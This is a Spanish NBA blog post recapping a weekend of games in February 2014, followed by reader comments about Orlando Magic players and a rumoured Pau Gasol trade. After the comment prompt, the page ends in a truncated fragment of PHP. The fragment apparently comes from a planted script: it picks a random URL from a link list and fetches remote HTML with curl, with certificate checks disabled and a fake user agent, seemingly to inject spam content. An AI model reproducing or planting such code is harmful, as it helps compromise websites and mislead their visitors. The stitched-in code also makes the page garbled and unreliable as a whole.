Informe del fin de semana: TJNBA down!

03 de February de 2014 por TheDeerHunter

No vamos a engañar a nadie. Durante el fin de semana el blog ha estado más tiempo caído que operativo y cuando lo ha estado, normalmente a ha sido a una velocidad insufrible. Parece que finalmente hemos podido resolver el problema (un puñetero bot de spam) pero os queremos pedir disculpas. Sin más dilaciones vamos a repasar lo que ha dado de sí el fin de semana.

“Se acabó la racha de partidos con >30 puntos para el señor Durant y ahora habrá que poner la mirada en ver hasta qué número llegan las victorias consecutivas de Oklahoma” Ruxixón

Efectivamente, el viernes se puso fin a la asombrosa racha de Kevin Durant. Durante 12 partidos consecutivos ha anotado 30 o más y aunque ante los Nets se quedó en 26 puntos, los Thunder vencieron muy cómodamente. Del partido debemos rescatar el 12 de 12 en tiros que firmó Ibaka mientras que de Brooklyn, poquita cosa destacable.

La jornada, además, dio para que algunos reivindicaran su condición de all-star con particular furia. Brutal 40-18 de Al Jefferson en el Staples (ante Lakers), pero no menos brutal el 35-12-6 de Rudy Gay ante Dallas, aunque terminara en una nueva derrota. Temporado muy meritoria del actual jugador de los Kings como para que nos hayamos olvidado tanto de él.  

Stephen Curry destrozó a Utah con sus 44 puntos, casi la mitad del total de su equipo en otro choque que se les complicó a base de bien a los Warriors. Sorprendentemente (hasta cierto punto) los Raptors doblegaron a los Nuggets a domicilio con Demar DeRozan iniciando lo que ha sido un fin de semana dorado, a la altura de lo que viene siendo su campaña. Terminando con el viernes, Atlanta destrozó a Philly en casa con rendimiento impresionante de su banquillo y “especial mención al juego interior formado por Brand y Scott” jhc. Los Grizzlies ganaron en Minneapolis en un fabuloso duelo Randolph vs Love, y Orlando rompió su mala racha ante  (¿cómo no?) los Bucks.

El sábado abrimos en lo que debería ser el harakiri de un jugador de baloncesto. ¿Cómo es posible firmar un 43-19 y perder? Que se lo pregunten a Kevin Love en Atlanta.  Si el día anterior Durant había roto su racha de anotación, el sábado los Thunder rompían su racha de 10 victorias seguidas en Washington (¿Mal de ojo de nuestro compañero Ruxixón?). La gira por el Este tampoco iba a ser un paseo.

Los Pacers no lo tuvieron nada fácil ante los Nets y ganaron en los últimos instantes. Lo mismo que los Blazers ante Raptors, con un DeRozan desatado. LeBron James, por su parte, impuso su ley ante Melo y los Knicks. Los Grizzlies enganchaban plaza de playoffs ante Milwaukee (“ya están aquí…”), con un sobresaliente partido del griego Nick Calathes.  Más sobrasaliente todavía fue el partido de Jeremy Lin que consiguió un triple doble ante, cómo no, Kyrie Irving y los Cavs. Goran Dragic tocóla guitarra ante los Bobcats y envió un mensaje a los que han de decidir el sustituto de Kobe Bryant para el All Star; los Clippers, con la dupla Griffin-Crawford, destrozaron a Utah que juegan sin Favors; los Spurs remontaron de milagro a unos Kings a pesar de que no jugó  Cousins; Anthony Davis y los pocos Pelicans sanos que quedan doblegaron fácil a los Bulls, y los Pistons destrozando a los Sixers.

Y ayer, un sólo partido y temprano, que había que ver la SuperBowl. Los Celtics ganaron cómodamente a Orlando, con la primera gran actuación del año de Rajon Rondo.

Comenta

7 comentarios a esta entrada

  1. Ruxixon dice:
    #1

    Yo encantado de tener mal de ojo si eso ayuda a Miami xD

      Citar

  2. Denise dice:
    #2

    En la primera parte los Celtics si fueron superiores a los Magic, la segunda estuvo más igualada no por méritos de Orlando, sino porque Boston tampoco está para tirar cohetes. El partido en cuanto a calidad fue un truño, pero al menos estuvo emocionante y hasta un lanzamiento exterior de Bass que acabó dentro a 1 minuto del final, el partido no se decantó. Visto lo cual, no creo que ninguno de los dos equipos alcance las 25 victorias.

      Citar

  3. txusma dice:
    #3

    Denise, tu que ves todos los partidos de los Magic, exactamente qué pasa con Andrew Nicholson? Empezó bastante bien la temporada e hizo alguna actuación destacable pero desde que volvieron Glen Davis y Tobias Harris prácticamente ha desaparecido e incluso Quinn juega más que él. Supongo q no debe ser el que más se esfuerza a nivel defensivo. Cuando traspasen a Glen Davis, supongo que Harris pasará a buscar de 4 (donde tb me gusta más) y Mo Harkless entrará a jugar de 3 pero, habrá minutos para Nicholson? Empezamos a darle por perdido? A mi en ataque me gusta bastante.

      Citar

  4. Denise dice:
    #4

    txusma:
    Denise, tu que ves todos los partidos de los Magic, exactamente qué pasa con Andrew Nicholson? Empezó bastante bien la temporada e hizo alguna actuación destacable pero desde que volvieron Glen Davis y Tobias Harris prácticamente ha desaparecido e incluso Quinn juega más que él. Supongo q no debe ser el que más se esfuerza a nivel defensivo. Cuando traspasen a Glen Davis, supongo que Harris pasará a buscar de 4 (donde tb me gusta más) y Mo Harkless entrará a jugar de 3 pero, habrá minutos para Nicholson? Empezamos a darle por perdido? A mi en ataque me gusta bastante.

    Debido a las lesiones de Harris y Davis, Nicholson empezó jugando minutadas y lo hizo bastante bien, normalmente andaba cercano al doble-doble, en ataque tiene un rango de tiro 4-5 metros en el que es muy bueno, también tiene una buena colocación para estar en el sitio justo para rebañar alguna pelota suelta y en definitiva, en ataque me parece un jugador completo dentro de la media. En defensa flojea más, por el número de rebotes que atrapa, puede parecer que es un gran defensor pero no lo es, suele cometer y cargarse de faltas muy rapidamente, y entre que es lento por naturaleza y que está bastante mas canijo que los otros ala-pivots que debe defender, normalmente lo machacan. A eso hay que añadir que es bastante picha fria y a veces tiene una mirada lenta y bobalicona y como con sueño tipo McGrady que le hacen parecer más apatico aún.
    En mi opinión, no tiene nivel ni va a convertirse en el 4 titular de un equipo, pero si es un jugador válido de rotación, estadisticamente hablando bastante productivo y que en determinados momentos de inspiración puede ser tu referencia en ataque siendo el factor X para ganar un partido. Como jugador, me recuerda bastante a Hakim Warrick aunque mucho menos físico.
    ¿Por qué juega tan poco? Esa es una pregunta para Vaughn, yo no lo entiendo porque la temporada de Davis es muy mala, y Nicholson podría tener mas minutos de los que tiene, pero supongo que a Vaughn no debe gustarle como jugador. y creo que es el principal candidato a ser traspasado junto a alguno de los 3 veteranos de la plantilla en el Deadline. Yo si fuese traspasado lo vería bien, por su caracter, no es un jugador que conecte con los aficionados y ojo!! hay que recordar también que tiene 24 años, por lo que quizás su margen de mejora ya es escaso
    Como jugador, no lo doy por perdido, simplemente no debemos esperar de él en que sea un tio de 20-10. Repito, su futuro en la liga será el de ser el 4 suplente de algun equipo.

    A mi también me gusta más Harris de 4 que de 3. Tobias es un tio que debe jugar con espacios y de 4 se sale para afuera, consigue más espacio y no tiene a un tio todo el dia pegado a su culo como si lo tiene cuando juega de 3. Además, para ser alero, tu tiro exterior debe ser amenazante y el de Tobias no lo es. Creo que se queda muy desperdiciado en las esquinas.

    Kyle O’Quinn me encanta. Todo garra, furia, pundonor, coraje. Es bastante bajo para ser el prototipo de C, pero lo compensa con cojones. Este tio si que no quiero que se vaya. Por números habrá quien piense que es un paquete, e indudablemente no tiene ni la mitad de calidad de Nicholson, pero hace un gran trabajo sucio. Este tio durante la próxima decada será el tipico Reggie Evans ó Maxiell (pero con más calidad) que solo está para jugar 12-16 minutos ó a veces nada, pero cuando sale se pega con el que haga falta y suele tener contratos bajos por lo que siempre es bueno tenerle.

    Por otra parte, Harkless me encanta, tiene todas las cualidades y herramientas del mundo para ser un gran stopper, un perfecto especialista defensivo para emparejarlo con los Lebron, George, Durant,…. El hecho de que Vaughn ponga a Harris de 3 le está perjudicando bastante, y a veces pasa, debido a las irregulares rotaciones del coach, de jugar casi 30 minutos a jugar 5. Pero siempre que le dan 20 minutos ó más, ralla a buen nivel, es un ladrón cojonudo, siempre atento a las líneas de pase y fisicamente es un puto bicho que ya nos ha dejado bastantes buenos mates generalmente tras robo. Su handicap el tiro exterior. En definitiva, un tio al que Vaughn debería mimar y cuidar más , recordemos que solo tiene 20 años, siendo un año más joven por ejemplo que Oladipo. Creo que puede ser en la liga un jugador tipo Trevor Ariza en su buena versión.

      Citar

  5. Denise dice:
    #5

    Los Clippers fichan a Vujacic. En mi opinión no les hace ninguna falta fichar a este sujeto que vive de hacer una temporada media buena y de dos tiros libres convertidos. Otro que estuvo hace poco en Clippers era Darius Morris, que acaba de fichar por Memphis. Éste si me parece un fichaje acertado para dar relevo a Conley, porque Calathes a pesar de que el otro día se fue a la veintena de puntos, no me gusta un pelo.

      Citar

  6. Denise dice:
    #6

    Pues cada vez suena con más fuerza el trade Pau Gasol por Okafor.
    No sé, está bien reducir los costes en multas por sobrepasar el límite, pero si tienen que traspasar a Pau, los Lakers deberían intentar pillar a algún jugador joven y valido a cambio.

      Citar

  7. TheDeerHunter dice:
    #7

    ¿Según me ha parecido entender por ahí en lo de Gasol habría una ronda involucrada? Creo que van por ahí los tiros, Denise.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>